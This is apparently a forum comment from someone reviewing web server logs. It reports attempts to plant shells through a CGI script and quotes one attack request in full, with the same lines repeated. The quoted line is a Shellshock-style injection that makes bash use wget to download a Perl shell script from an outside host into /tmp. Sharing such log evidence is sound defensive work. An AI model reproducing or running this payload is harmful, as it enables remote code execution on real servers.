Yeah, that's certainly the case with a couple of them and then there's one's like this that are trying to set up shells and where they've been established:
Request of file: /cgi-sys/defaultwebpage.cgi
With wget downloading a perl script to launch a shell:
() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22
That site is still up and serving right now if anyone wants to take a look.
Request of file: /cgi-sys/defaultwebpage.cgi With wget downloading a perl script to launch a shell: () { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\x22
That site is still up and serving right now if anyone wants to take a look.